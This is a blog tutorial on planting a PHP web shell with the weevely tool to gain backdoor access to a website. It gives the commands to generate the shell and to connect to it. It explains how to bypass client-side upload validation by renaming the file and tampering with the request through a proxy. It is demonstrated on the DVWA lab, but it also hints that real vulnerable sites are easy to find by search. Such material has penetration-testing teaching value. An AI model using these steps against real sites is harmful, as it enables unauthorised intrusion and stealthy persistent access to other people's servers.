How to upload a PHP web shell using weevely to get backdoor access

by hash3liZer . 02 August 2018

How to upload a PHP web shell using weevely to get backdoor access

Getting backdoor access means to have another way in, usually a hidden way from where you can come and go out without anyone else noticing. Backdoors are normally installed through some sort of uploading functionality where the uploaded data doesn't get validated. This allows an attacker to simply put a malicious file in the field and submit the forms. Most PHP based websites are vulnerable to these kinds of attacks.

There is various kind of backdoor shells you can find out the internet. For now, we are going to see the usage of the weevely shell, the simplest type of shell which you can control from the command line. Further, it is comprised of a few lines which make it a lot less heavy than most of the traditional backdoor shells. This gives it the credibility of bypassing the file size filter.

Let's put it all together. We are going to upload a backdoor shell generated by weevely to gain backdoor access to a target site. To comply with the rules, I've set up a DVWA application on a server for demonstration. Well, finding PHP vulnerable applications is not much of a difficult task. You just have the put the right query in and the results will be in front of you.

STEP 1

Generate the shell.

First, we would need the shell. The syntax of weevely is pretty simple. Weevely encodes the payload with a key phrase, so no one else can use it in order to access the target system. Further, it is a PHP shell which would require PHP to be installed on the target system.

Remember, you can not always execute a Python shell on a PHP application or a PHP shell on a Python application, because the environment would be different for both of the applications.

Generate a shell with the commands:

$ weevely generate [password] [path]
weevely shell

STEP 2

Uploading Shell

The next thing you have to do is to upload the shell which is not going to be a handy process. You've to find a way in your application. I have got the DVWA application hosted on a server and we are going to try out some of the tweaks to upload the shell.

The simplest type is where there is no validity at all. Upload the file and you are good to go:

uploading shell

In some cases, there will be some validation on the client side, i.e. javascript validation that could be bypassed by intercepting the proxy and manipulate the request. In this case you could rename the file to shell.php.jpeg:

client validation

And then intercept and manipulate the request using a proxy:

proxy manipulation

Remember that while uploading a shell, you've to take care of two things:

  • Where the shell is uploading. This is the relative path that we will use to further interact with the system.
  • When uploading, the extension must of the supported platform. In our case, it is .php.

In our case the full path to our PHP payload is http://target.com/dvwa/hackable/uploads/shell.php

STEP 3

Gaining Access

The last phase is to establish connection with payload and interact with the target. To generate a session between server and the client, execute the command:

$ weevely http://target/dvwa/hackable/uploads/shell.php [password]
weevely shell

If everything goes right and the shell was successfully executed on the server, you will be able to get a prompt on your terminal:

terminal

Conclusion

We used weevely to generate and execute a shell on a vulnerable target application and use it in order to have a backdoor access to the target system. Weevely shells are quite good at a stealthy execution and their payload size. Note that it is a good practice to use a respective payload for the target like ASP shells for ASP.net applications etc.